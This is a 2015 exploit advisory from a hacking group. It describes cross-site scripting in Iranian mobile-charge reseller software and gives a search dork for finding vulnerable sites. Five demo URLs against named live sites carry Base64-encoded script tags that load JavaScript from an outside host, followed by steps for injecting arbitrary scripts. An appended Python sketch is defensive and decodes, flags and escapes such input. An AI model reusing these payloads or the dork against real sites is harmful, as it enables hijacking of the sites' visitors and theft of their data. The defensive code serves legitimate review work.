
Iranian charge resellers cross-site scripting

Author: Iran Cyber Security Group, Published: 30-05-2015
# Exploit Title: Iranian charge resellers cross-site scripting
# Exploit Author: Iran Cyber Security Group
# Version: All Versions
# Software Link : http://chargereseller.com
# Home: http://WwW.iran-cyber.org
# Discovered By : root3r & KamraN HellisH
# Dork : intext:در این سامانه شارژ بصورت تاپ آپ عرضه می گردد و پس ازطی مراحل خرید، سیم کارت شما بصورت خودکار شارژ شده و نیازی به ثبت پین یا رمز شارژ نمی باشد.
Demo :

http://buy-online-charge.wifa.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://charge.retrica.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://irancell.net/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://righ3el.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

http://resellercharge.ir/verify.php?data=eyJTdGF0dXMiOjEwMCwiVHlwZSI6IlBpblByb2R1Y3QiLCJUcmFuSWQiOjEsIlJlZklkIjoxLCJQaW5Qcm9kdWN0S2luZCI6IjEiLCJVbml0QW1vdW50IjoyMDAwLCJDb3VudCI6MSwiQnV5SW5mbyI6W3siUGluIjoiPGgxPjxzY3JpcHQgc3JjPWh0dHA6Ly93d3cubmV0Zml4ZWQuaXIvWFNTLmpzPjwvc2NyaXB0PiJ9XX0=

POC :

The vulnerable code is Base64-encoded.

If you want to inject XSS code:

1. Decode the Base64-encoded code using HackBar or base64decode.org

2. Inject your XSS code

3. Encode the code back to Base64 using HackBar or base64encode.org
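For operators of an affected site, the sketch below (an added example, not code from the advisory or from the vendor) decodes the data parameter of logged verify.php requests, flags any string field that carries HTML-significant characters, and shows the output encoding that neutralises such a value. The field names come from decoding the Demo value above; the host, the sample values and the assumption that verify.php writes the decoded Pin into its page are constructed for illustration.

```python
import base64, html, json
from urllib.parse import parse_qs, quote, urlsplit

MARKUP = set("<>\"'&")  # characters that matter in an HTML context

def decode_data(url):
    """Return the JSON carried in ?data=, or None if absent or malformed."""
    values = parse_qs(urlsplit(url).query).get("data")
    if not values:
        return None
    try:
        # parse_qs turns a literal '+' into a space; undo that before decoding
        raw = base64.b64decode(values[0].replace(" ", "+"), validate=True)
        return json.loads(raw)
    except ValueError:  # bad Base64, bad UTF-8 or bad JSON
        return None

def suspicious_fields(obj, path="data"):
    """Yield (path, value) for each string holding HTML-significant characters."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from suspicious_fields(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from suspicious_fields(value, f"{path}[{i}]")
    elif isinstance(obj, str) and MARKUP & set(obj):
        yield path, obj

def scan(url):
    """Findings for one logged request URL (empty list means nothing to flag)."""
    obj = decode_data(url)
    return [] if obj is None else list(suspicious_fields(obj))

def render_pin(pin):
    """Output-encode a Pin value before it is written into the HTML response."""
    return html.escape(str(pin), quote=True)

def make_url(payload):
    """Build a constructed sample URL (host is a placeholder)."""
    blob = base64.b64encode(json.dumps(payload).encode()).decode()
    return "http://shop.example/verify.php?data=" + quote(blob)

# Constructed samples: a normal receipt and one carrying harmless markup
CLEAN = make_url({"Status": 100, "Type": "PinProduct", "BuyInfo": [{"Pin": "1234567890"}]})
TAINTED = make_url({"Status": 100, "Type": "PinProduct", "BuyInfo": [{"Pin": "<h1>test</h1>"}]})

if __name__ == "__main__":
    for url in (CLEAN, TAINTED):
        print(scan(url))
```

Escaping on output is the fix for the reflection itself; the scan is only useful for reviewing past requests, since Base64 hides the markup from plain substring searches over access logs.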


# Thanks To : Mohammad Nofozi - Sheytan azzam - JOK3R - WH!T3_W01F - Dragon - CRY$I$ BL4CK And All Members of Iran Cyber Security Group
